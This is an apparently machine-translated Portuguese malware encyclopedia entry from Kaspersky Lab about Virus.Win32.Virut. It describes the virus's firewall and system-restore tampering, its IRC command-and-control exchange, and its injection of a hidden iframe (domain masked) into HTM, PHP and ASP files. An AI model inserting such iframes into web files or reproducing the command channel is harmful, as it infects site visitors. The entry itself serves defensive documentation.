ESTE SERVIÇO PODE CONTER TRADUÇÕES FEITAS PELO GOOGLE. O GOOGLE SE ISENTA DE TODAS AS GARANTIAS RELACIONADAS ÀS TRADUÇÕES, EXPRESSAS OU IMPLÍCITAS, INCLUINDO QUALQUER RESPONSABILIDADE EM RELAÇÃO À PRECISÃO, CONFIABILIDADE E QUALQUER DEVER IMPLÍCITO SOBRE SUA COMERCIALIZAÇÃO, ADEQUAÇÃO PARA UM FIM ESPECÍFICO E NÃO-VIOLAÇÃO.

Para sua conveniência, o site da Kaspersky Lab foi traduzido com a utilização do software de tradução Google Tradutor. Foram realizados esforços razoáveis para o oferecimento de uma tradução precisa; entretanto, as traduções automatizadas não são perfeitas e tampouco pretendem substituir a tradução qualificada de especialistas. Essas traduções são fornecidas como um serviço para os usuários do site da Kaspersky Lab e são exibidas "como estão". Não há nenhuma garantia de qualquer tipo, seja expressa ou implícita, sobre a precisão, confiabilidade, ou exatidão de quaisquer traduções feitas do inglês para qualquer outro idioma. Alguns conteúdos (como imagens, vídeos, Flash, etc.) podem não estar corretamente traduzidos devido às limitações do programa de tradução.

Virus.Win32.Virut

Data de detecção 10/23/2007
Classe Virus
Plataforma Win32
Descrição

O vírus adiciona o arquivo executável do processo de host à lista de aplicativos confiáveis ​​do firewall do Windows.

Em seguida, desativa a função “Restaurar arquivos do sistema”.

O vírus tenta entrar em contato com os seguintes servidores de IRC:




prox ***** ircgalaxy.pl



irc ***** ef.pl



Se uma conexão for estabelecida, o vírus envia os seguintes comandos para o servidor:




NICK dewxxpyi



USER b



JOIN #. <Rnd1>, onde rnd1 é um número aleatório.



Em seguida, o vírus entra no modo de espera, pronto para receber comandos do servidor de IRC malicioso e executá-los.

O vírus é capaz de executar os seguintes comandos:

  • Obtenha: baixe um código malicioso da Internet e insira-o nos processos em execução no computador da vítima.
  • ! hosu: abre URLs especificadas no computador da vítima.

O vírus também verifica o disco rígido do computador da vítima em busca de arquivos com as seguintes extensões:




HTM



PHP



ASP



Se encontrado, adiciona a seguinte string a eles:

<iframe src = "http: //****.pl/rc/" width = 1 altura = 1
style = "border: 0"> </ iframe>

Link para o original